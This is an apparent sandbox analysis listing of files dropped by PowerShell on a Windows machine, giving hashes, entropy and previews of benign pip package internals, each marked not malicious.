                                                                                                                                                                                                              SSDEEP:48:pPitTu43ekdze/DzJx2tF0iAfFuiS/Vi0:pqTP3Pdze/PJyHWs
                                                                                                                                                                                                              MD5:1AF7D1EAD2F83035773621C779696A76
                                                                                                                                                                                                              SHA1:D45811752C4EE3F80A080729BCFC0837BE81A1FC
                                                                                                                                                                                                              SHA-256:7E30F0F9FC7DD92017FB0D3431B2B72AFC2831068B95B6FCEEFC4BA4AC726A6D
                                                                                                                                                                                                              SHA-512:1381E3B2CE08B229997A58CCB86F1F852990A47B3372923072F237BC7284A2BF144389908ECAE121EF6C9A34BA44FCF041D50D18A88FC8CC17123753617AD93A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.es.........................0.....d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Optional)...FormatControlc.....................N.....e.Z.d.Z.d.Z.g.d...Z.........d.d.e.d.e.d.e.e.....d.e.d.e.e.....d.d.f.d...Z.y.)...SelectionPreferenceszd. Encapsulates the candidate selection preferences for downloading. and installing files.. ....allow_yanked..allow_all_prereleases..format_control..prefer_binary..ignore_requires_pythonNr....r....r....r....r......returnc.....................R.....|...d.}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).aw...Create a SelectionPreferences object... :param allow_yanked: Whether files marked as yanked (in the sense. of PEP 592) are permitted to be candidates for install.. :param format_control: A FormatControl object or None. Used to control. the selection of source packages / binary packages when consulting. the index and links.. :param prefer_binary:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4971
                                                                                                                                                                                                              Entropy (8bit):5.387393688086788
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:n3AIuKf+/statQpclT9aNcibB07BCjYf9KecqNna:nQIP+6l23a6it0kYfDna
                                                                                                                                                                                                              MD5:B62F4AA239CEB92F85B852E91657B498
                                                                                                                                                                                                              SHA1:71FE8DEE5FCAC10A914884BFC9598C94E04A1B54
                                                                                                                                                                                                              SHA-256:460B4C3768B6236D02A2F4EB9C1DAE204F53A77F2755EA77AE1CCD75AAC1F8F9
                                                                                                                                                                                                              SHA-512:093F78E3E128AC4BCBC4140BFE70CD2A62BD6E78E80C228C6A2F3C3B13A4FAE54D1028FBB4E2FF39890A31B105A5EB6AE282D0B330C9F1EA8E43DEB0E0BA39C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................`.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......N)...List..Optional..Set..Tuple)...Tag)...get_supported..version_info_to_nodot)...normalize_version_infoc..........................e.Z.d.Z.d.Z.g.d...Z.........d.d.e.e.e.........d.e.e.e.d.f.........d.e.e.e.........d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.y.)...TargetPythonzx. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. )..._given_py_version_info..abis..implementation..platforms..py_version..py_version_info.._valid_tags.._valid_tags_setNr....r.....r....r......returnc...........................|.|._.........|...t.........j...................d.d...}.n.t.........|.........}.d.j...................t.........t.........|.d.d...................}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........d.|._.........d.|._.........y.).a<...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5797
                                                                                                                                                                                                              Entropy (8bit):5.45719332896762
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:jH5zh3/UmKGhFT+p8NTyjK/GNLbcUGTm541Sp:jb3/ULc8pEyjK/GRchT5O
                                                                                                                                                                                                              MD5:38AAE9CB2AFB8FED3188C39CEC05ECC3
                                                                                                                                                                                                              SHA1:7316DBB53588101696712B4391486C4095D8924F
                                                                                                                                                                                                              SHA-256:A847CED805963672B62ED2AED3512D9E6FF479D0D959BADC76AC5198E580B954
                                                                                                                                                                                                              SHA-512:BAA100A8CDD8BF00393D760565FA36047DD5C5DE814B25609432A173E36388453302EC0A7F168CF92D720041CA23BFDCBC528F9A50C4A6E7AD3AA7BABD528E87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................P.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).z`Represents a wheel file and provides access to the various parts of the.name that have meaning.......N)...Dict..Iterable..List)...Tag)...InvalidWheelFilenamec..........................e.Z.d.Z.d.Z...e.j...................d.e.j...........................Z.d.e.d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....d.e.f.d...Z.d.e.e.....d.e.e.e.f.....d.e.f.d...Z.d.e.e.....d.e.f.d...Z.y.)...Wheelz.A wheel filez.^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$..filename..returnNc..........................|.j...................j...................|.........}.|.s.t.........|...d.............|.|._.........|.j...................d.........j...................d.d.........|._.........|.j...................d.........j...................d.d.........|._.........|.j........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):931
                                                                                                                                                                                                              Entropy (8bit):4.47254445210143
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1TLX4xHtjZk0reEeSErPYZAx07MSim0rcg0rvWbUaH:toN+0rehSEKg7E0rcg0r0UA
                                                                                                                                                                                                              MD5:19D6ACE84BB3505BD0C0555DFCD2D7D8
                                                                                                                                                                                                              SHA1:0F95933E28B70D16841D840B5025FE75F6264337
                                                                                                                                                                                                              SHA-256:8443EEF15746139A95012BFABCBCFE47E460879FBB2CC6DA8B58E0B6130277C3
                                                                                                                                                                                                              SHA-512:FC7AD543C2FAE0A914447564540F11B5E97F01E61D0160DFA054BDC1927C97F41A2A8992B2DD43D9CEBA9D8F7718D0CDD6FB21FEFD1BC758C0E580B7F21C77B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from pip._vendor.packaging.version import parse as parse_version..from pip._internal.models.link import Link.from pip._internal.utils.models import KeyBasedCompareMixin...class InstallationCandidate(KeyBasedCompareMixin):. """Represents a potential "candidate" for installation.""".. __slots__ = ["name", "version", "link"].. def __init__(self, name: str, version: str, link: Link) -> None:. self.name = name. self.version = parse_version(version). self.link = link.. super().__init__(. key=(self.name, self.version, self.link),. defining_class=InstallationCandidate,. ).. def __repr__(self) -> str:. return "<InstallationCandidate({!r}, {!r}, {!r})>".format(. self.name,. self.version,. self.link,. ).. def __str__(self) -> str:. return f"{self.name!r} candidate (version {self.version} at {self.link})".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6889
                                                                                                                                                                                                              Entropy (8bit):4.5391529804609565
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:bSpgC4yyRu1C4L9+xf2BOdcoedGIELmuP/1QtTOX3ijzL/hWLBRA2YnHS7X:bSpgC43ReC4LExfS6coedGIELmuPtR4w
                                                                                                                                                                                                              MD5:85AE2D81EC82E83403CC20439739F1EF
                                                                                                                                                                                                              SHA1:2BE67E05E637FC6DEFE87897294B4A61043223FF
                                                                                                                                                                                                              SHA-256:170A2E60129CA9C921EC1FA4D87DC75604618454EE905C2A892DE47EFB452D29
                                                                                                                                                                                                              SHA-512:A89929AE9F624C15143A15EEEE5A040EF47FFD2879CC20690538EFB71949E634E7F86A5EA45A5E27947B507AFEBCF49136E27DF76E03C96BF11374774803EB96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""" PEP 610 """.import json.import re.import urllib.parse.from typing import Any, Dict, Iterable, Optional, Type, TypeVar, Union..__all__ = [. "DirectUrl",. "DirectUrlValidationError",. "DirInfo",. "ArchiveInfo",. "VcsInfo",.]..T = TypeVar("T")..DIRECT_URL_METADATA_NAME = "direct_url.json".ENV_VAR_RE = re.compile(r"^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$")...class DirectUrlValidationError(Exception):. pass...def _get(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> Optional[T]:. """Get value from dictionary and verify expected type.""". if key not in d:. return default. value = d[key]. if not isinstance(value, expected_type):. raise DirectUrlValidationError(. f"{value!r} has unexpected type for {key} (expected {expected_type})". ). return value...def _get_required(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> T:. value = _get(
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2486
                                                                                                                                                                                                              Entropy (8bit):4.3270582835610565
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:FFgUsUhREjmTCXrEVvRdeh4D003/Y4/kkaHyron2DlWU8lUJl:n7sIYPqDaHyg2DlWU8u
                                                                                                                                                                                                              MD5:BDC269C3F40962AE622812360A68C3F3
                                                                                                                                                                                                              SHA1:22CB3E5D1D2D4921C56BEE8B25322405D75660E6
                                                                                                                                                                                                              SHA-256:C2DB10A922BD1DA522371404B81F82EB67958A6C3A1B8FD5405C55F7EFCA0C11
                                                                                                                                                                                                              SHA-512:1C7F457CDD19975A0ABA60438CC5035F6FA7561B7B0339704AEF2F7FE55104F0CFF8EC66B61BFF74BD7CBEBF3F6DF8CFB89D230775B4B3258F51E729BBDB0767
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import FrozenSet, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import CommandError...class FormatControl:. """Helper for managing formats from which a package can be installed.""".. __slots__ = ["no_binary", "only_binary"].. def __init__(. self,. no_binary: Optional[Set[str]] = None,. only_binary: Optional[Set[str]] = None,. ) -> None:. if no_binary is None:. no_binary = set(). if only_binary is None:. only_binary = set().. self.no_binary = no_binary. self.only_binary = only_binary.. def __eq__(self, other: object) -> bool:. if not isinstance(other, self.__class__):. return NotImplemented.. if self.__slots__ != other.__slots__:. return False.. return all(getattr(self, k) == getattr(other, k) for k in self.__slots__).. def __repr__(self) -> str:. return f"{self.__class__.__name__}
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1030
                                                                                                                                                                                                              Entropy (8bit):4.660446953045376
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:yTrPnCsK6Xlr4n7AizUQ+J/nICn8liQ2koAb911i7k2bPUMHN:yTrQ6XQZQQm78ktkoAb9O7J5t
                                                                                                                                                                                                              MD5:F67480DB56CF588A2EE92844959BBABF
                                                                                                                                                                                                              SHA1:26707B880BF178100E5A233E43832C57A4916895
                                                                                                                                                                                                              SHA-256:B589CBF28C468B8692356BABD261BC0C03FBAC2EB2BA16BF33024EF31C3472B2
                                                                                                                                                                                                              SHA-512:F8BEB8F1B1AC8A8AD038D04F1A3211A316851922083F28612F86F8CEB611354BD008F5253F8C322862894DE78BA1636BA0D4277DD20C813F043FEA0F10DC3A84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import urllib.parse...class PackageIndex:. """Represents a Package Index and provides easier access to endpoints""".. __slots__ = ["url", "netloc", "simple_url", "pypi_url", "file_storage_domain"].. def __init__(self, url: str, file_storage_domain: str) -> None:. super().__init__(). self.url = url. self.netloc = urllib.parse.urlsplit(url).netloc. self.simple_url = self._url_for_path("simple"). self.pypi_url = self._url_for_path("pypi").. # This is part of a temporary hack used to block installs of PyPI. # packages which depend on external urls only necessary until PyPI can. # block such packages themselves. self.file_storage_domain = file_storage_domain.. def _url_for_path(self, path: str) -> str:. return urllib.parse.urljoin(self.url, path)...PyPI = PackageIndex("https://pypi.org/", file_storage_domain="files.pythonhosted.org").TestPyPI = PackageIndex(. "https://test.pypi.org/", file_storage_domain="t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2818
                                                                                                                                                                                                              Entropy (8bit):4.461309983570084
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:/+9xh5cEAuWUj0liK4C4O2IAqM2AJitkt0uXU9tyrIV/QRG7c/1i1eTbnQAyS:/cxh5ctun0IZyzGJiqU9orgoRGwNi1ef
                                                                                                                                                                                                              MD5:09657AB688E36AE6641F732999FF5E92
                                                                                                                                                                                                              SHA1:8E0E2F7C9AE3D859A2F11D6DBBC5F7AEA26CC1E5
                                                                                                                                                                                                              SHA-256:CD1559A1ACFEDAFB2B7B38FF1F784B3A131908AF5CED36F35A00BE8CE6A50F4D
                                                                                                                                                                                                              SHA-512:A8BE098B587C9B3CDB530BA7D5468450AFF000843A94E5AEA689A71CCAA78E763C51EBD06CF49A9B3503CFAB3B278DC487577000EA5A6541991CB738CDAA8F96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Any, Dict, Sequence..from pip._vendor.packaging.markers import default_environment..from pip import __version__.from pip._internal.req.req_install import InstallRequirement...class InstallationReport:. def __init__(self, install_requirements: Sequence[InstallRequirement]):. self._install_requirements = install_requirements.. @classmethod. def _install_req_to_dict(cls, ireq: InstallRequirement) -> Dict[str, Any]:. assert ireq.download_info, f"No download_info for {ireq}". res = {. # PEP 610 json for the download URL. download_info.archive_info.hashes may. # be absent when the requirement was installed from the wheel cache. # and the cache entry was populated by an older pip version that did not. # record origin.json.. "download_info": ireq.download_info.to_dict(),. # is_direct is true if the requirement was a direct URL reference (which. # includes editable requi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20777
                                                                                                                                                                                                              Entropy (8bit):4.5847812976968205
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:UTt7OjNT51GuxMgExJAvYDr3pJYQ+ebhH4Lb3GIppfT3QBHnarT3:A7UNT51rxkxmw/ZJx+YhH4Lb3G8tzQhg
                                                                                                                                                                                                              MD5:EB81AAD0A35DD6B2DE4C27B643E404C7
                                                                                                                                                                                                              SHA1:15A3B67CF3296F1DF342BACB84F02BF3FE532234
                                                                                                                                                                                                              SHA-256:5E2ACE006BF58E032EEEFBBCEE4B8F6E88468FB547A7056B776AB729481540D8
                                                                                                                                                                                                              SHA-512:EF236F8A11582F93B856F4F9888CBEDFFC30A995E1A04F567F31128CF985831EF996581B8190E7E65E5B3A273A77176CA3DA88EB6C1867A1EC0B7121039EC73D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import itertools.import logging.import os.import posixpath.import re.import urllib.parse.from dataclasses import dataclass.from typing import (. TYPE_CHECKING,. Any,. Dict,. List,. Mapping,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.misc import (. pairwise,. redact_auth_from_url,. split_auth_from_netloc,. splitext,.).from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.urls import path_to_url, url_to_path..if TYPE_CHECKING:. from pip._internal.index.collector import IndexContent..logger = logging.getLogger(__name__)...# Order matters, earlier hashes have a precedence over later hashes for what.# we will pick to use.._SUPPORTED_HASHES = ("sha512", "sha384", "sha256", "sha224", "sha1", "md5")...@dataclass(frozen=True)
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                              Entropy (8bit):4.455127026433689
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:QCBhJAYp5FaREQr4GtXUSd7mry13LElvv1sydX/YwcjcFCbP:DhRLwHUEdCry130sOejcQ7
                                                                                                                                                                                                              MD5:77B8766C2C20290FC2545CB9F68E64EB
                                                                                                                                                                                                              SHA1:FC639818C98AB821887BD5AE95FD49DED2D8634A
                                                                                                                                                                                                              SHA-256:DC4150A7F202BBFB211F5F9306A865D1002EB0A08F0C53A580715E3785E8C16B
                                                                                                                                                                                                              SHA-512:BE0B3E58A796077E457526ABE8C9E1EE7D3D5707B588DB4E655BA454546DE0366189C34811954680E2CFE6172F04DD4BD6AF4FEE4599BADD63FF0126A5A344EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation.."""...SCHEME_KEYS = ["platlib", "purelib", "headers", "scripts", "data"]...class Scheme:. """A Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. """.. __slots__ = SCHEME_KEYS.. def __init__(. self,. platlib: str,. purelib: str,. headers: str,. scripts: str,. data: str,. ) -> None:. self.platlib = platlib. self.purelib = purelib. self.headers = headers. self.scripts = scripts. self.data = data.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4643
                                                                                                                                                                                                              Entropy (8bit):4.246322915605786
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:WxeLxlCN2huvcRLnU6rgU0Sgb6LhqqqlAeQEW4aL79B1sOp8DMUPD7iGKzK0MLwj:VxlCNRkRbJG6FSlArn4a/tIrL0Mi9
                                                                                                                                                                                                              MD5:3BC5A1B39721B6B06248F40CBEBB40D9
                                                                                                                                                                                                              SHA1:6EC69D7090B207E5B202989ACD581D0B86A0118D
                                                                                                                                                                                                              SHA-256:012572C99C622482F0EDB4C8555A49C7C276F773371E4E45DF78A51A7D1EF347
                                                                                                                                                                                                              SHA-512:8DF2CB44F070630447205681F141E457B3900C1AE4582C40B3A0ECDF666DCBC667E8EE9B1D6D60BC32AC4260BBEE697A04DDB0E689A056091AC218A5EAE355DC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import itertools.import logging.import os.import posixpath.import urllib.parse.from typing import List..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.models.index import PyPI.from pip._internal.utils.compat import has_tls.from pip._internal.utils.misc import normalize_path, redact_auth_from_url..logger = logging.getLogger(__name__)...class SearchScope:.. """. Encapsulates the locations that pip is configured to search.. """.. __slots__ = ["find_links", "index_urls", "no_index"].. @classmethod. def create(. cls,. find_links: List[str],. index_urls: List[str],. no_index: bool,. ) -> "SearchScope":. """. Create a SearchScope object after normalizing the `find_links`.. """. # Build find_links. If an argument starts with ~, it may be. # a local file relative to a home directory. So try normalizing. # it and if it exists, use the normalized version.. # This is del
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1907
                                                                                                                                                                                                              Entropy (8bit):4.375302448918886
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1REm/+RAsQ8GYLRvBo2qBVP2XMglzB7QMaqn7V4eMQKuIgrGIpshf/Pg7d7l05IW:SAG1iVglQONze/Y2
                                                                                                                                                                                                              MD5:A9FA37FF60BA1523C11FD12AF309E711
                                                                                                                                                                                                              SHA1:64627B9F7F60ADD87CFE2D2B107D262480AAB44E
                                                                                                                                                                                                              SHA-256:299762EBA82C47EFD151752BF6E7A3B2C937AE64C7AD054959E340DAC57E5526
                                                                                                                                                                                                              SHA-512:DA77858C1164B41B596907B9323573DE1B7870F75B434A407E3652E97B13668238EF4F1A99D77727E7DF7043F8A4C61F6965458768ADDB7AC0824C6CEAEEDBA8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional..from pip._internal.models.format_control import FormatControl...class SelectionPreferences:. """. Encapsulates the candidate selection preferences for downloading. and installing files.. """.. __slots__ = [. "allow_yanked",. "allow_all_prereleases",. "format_control",. "prefer_binary",. "ignore_requires_python",. ].. # Don't include an allow_yanked default value to make sure each call. # site considers whether yanked releases are allowed. This also causes. # that decision to be made explicit in the calling code, which helps. # people when reading the code.. def __init__(. self,. allow_yanked: bool,. allow_all_prereleases: bool = False,. format_control: Optional[FormatControl] = None,. prefer_binary: bool = False,. ignore_requires_python: Optional[bool] = None,. ) -> None:. """Create a SelectionPreferences object... :param allow_yank
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4272
                                                                                                                                                                                                              Entropy (8bit):4.305122138474475
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:kc9EQKRRanYetfd3atqSKpclTqQPEfheKckjXiOf3N08lsqHpadDPcfAzLGXN8Ln:kc7Kj7e9tatQpclTqQPLK0uVOPoKQLWV
                                                                                                                                                                                                              MD5:2DF3C0F383CD9A90B1C6EC3785F267EC
                                                                                                                                                                                                              SHA1:479A26A092F77A856B804A38331A6B8D2440CFC6
                                                                                                                                                                                                              SHA-256:DF8124A2BACCB91BD1A7E6E3A87289F9B38EEF59BDC5D8CDD9BF16585102D875
                                                                                                                                                                                                              SHA-512:83A41BA6F48A235E75B8B97EFBF64DC777B24E92E1D011E6403C326891040AF544047CE1FBE41417DBDC6EBD5755D612B3D98CC68B1729A3FAB48A545E3937F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import sys.from typing import List, Optional, Set, Tuple..from pip._vendor.packaging.tags import Tag..from pip._internal.utils.compatibility_tags import get_supported, version_info_to_nodot.from pip._internal.utils.misc import normalize_version_info...class TargetPython:.. """. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. """.. __slots__ = [. "_given_py_version_info",. "abis",. "implementation",. "platforms",. "py_version",. "py_version_info",. "_valid_tags",. "_valid_tags_set",. ].. def __init__(. self,. platforms: Optional[List[str]] = None,. py_version_info: Optional[Tuple[int, ...]] = None,. abis: Optional[List[str]] = None,. implementation: Optional[str] = None,. ) -> None:. """. :param platforms: A list of strings or None. If None, searches for. packages that are supported by the
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3600
                                                                                                                                                                                                              Entropy (8bit):4.5473966910251695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LwCUcYKBjGYBcAkEOYKiKV/8N1lE/GNLnxP1:VJBiBUE/Gr1
                                                                                                                                                                                                              MD5:A6E4DE72BC628633E4AC9598B55EA9E7
                                                                                                                                                                                                              SHA1:CF55FF5F5C3457AD21CFB24F341871B7378A4197
                                                                                                                                                                                                              SHA-256:62A6B3A0867299AFD0D5E8C56B50BB3472904515A5BD691D2BDE9544A98305E2
                                                                                                                                                                                                              SHA-512:8862E0663343C8B476C1EB5BEEBD7CE0FF05B3D43772F9B221CEF20EFDF8F148D0B77B4701454647C5BFF1C7034C4FE344B8B80F094845BAB5475BB3B6361C57
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Represents a wheel file and provides access to the various parts of the.name that have meaning..""".import re.from typing import Dict, Iterable, List..from pip._vendor.packaging.tags import Tag..from pip._internal.exceptions import InvalidWheelFilename...class Wheel:. """A wheel file""".. wheel_file_re = re.compile(. r"""^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$""",. re.VERBOSE,. ).. def __init__(self, filename: str) -> None:. """. :raises InvalidWheelFilename: when the filename is invalid for a wheel. """. wheel_info = self.wheel_file_re.match(filename). if not wheel_info:. raise InvalidWheelFilename(f"{filename} is not a valid wheel filename."). self.filename = filename. self.name = wheel_info.group("name").replace("_", "-"). # we'll assume "_" means "-" due to whe
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):50
                                                                                                                                                                                                              Entropy (8bit):4.1288840705376355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:5WFVQtGSKH4F0MzDv:YQtG5YiMfv
                                                                                                                                                                                                              MD5:3893F116D94097C4AE72769A5F7C21F7
                                                                                                                                                                                                              SHA1:CC7B633895C11040D0B99E7D0575B1D031652035
                                                                                                                                                                                                              SHA-256:8DFE93B799D5FFBCE401106B2A88C85C8B607A3BE87A054954A51B8406B92287
                                                                                                                                                                                                              SHA-512:924BC4A7222FC638FC8FAB4A6E7AEA876E25DCD355AFF628AA21A77BA0ECE90E774FA75D1797CFE688B7129626AAE395662489419AD53CAB4A842367FE97BCB8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Contains purely network-related utilities..""".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):271
                                                                                                                                                                                                              Entropy (8bit):5.095236469830096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Lr0aCCVmXQtG5YiMh/Z6B0Wlt495/n23d6oAreKAsShMR6IaYleHXlll:MaCCMXVYic6BvP6/2ImblMRjaYkH1ll
                                                                                                                                                                                                              MD5:AC272126EEA37D5999C353B555DECA41
                                                                                                                                                                                                              SHA1:F3C05FEA053739F3AB665650BBEB74EF67277419
                                                                                                                                                                                                              SHA-256:5C5DDBDFFB23596EBF3F518F658EDBF8B2C262151CCBE8D201E7B5DAC8BD29BF
                                                                                                                                                                                                              SHA-512:52B3FF6DCE37544647361E35E95FA07AA3218003BB02B052058F52767122DA2780B964802FB945F9194F223D0FD676B3CF84EAD15D6279DB1A33CC402197B022
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e2...............................d.Z.y.).z+Contains purely network-related utilities..N)...__doc__........rC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22005
                                                                                                                                                                                                              Entropy (8bit):5.365629759583273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:N7tN0q2zfeqFDTXfadOA3Z7eNkgy/nYH8kad6wkhZMh/ccO2:Jtyq2P9Tm7eNkgy95wZMh/cF2
                                                                                                                                                                                                              MD5:44987BB571DC4538680062368274841E
                                                                                                                                                                                                              SHA1:9FCE4A06136B0D9D7717132553B88D774AB2574F
                                                                                                                                                                                                              SHA-256:35A9FB9D35F5BA905FC4842742EFEC57B9E3A062ED1892D0F7B641B7B81DA1FE
                                                                                                                                                                                                              SHA-512:053B37AECABD5A9F359B250B64CF68C93EAC09CE1F000FB10A69BDF3809263BE583F1283E4329347659CBE36DAB9FD906901EC5CD7C8D1E8478884CA7D76F9F1
                                                                                                                                                                                                              Malicious:false
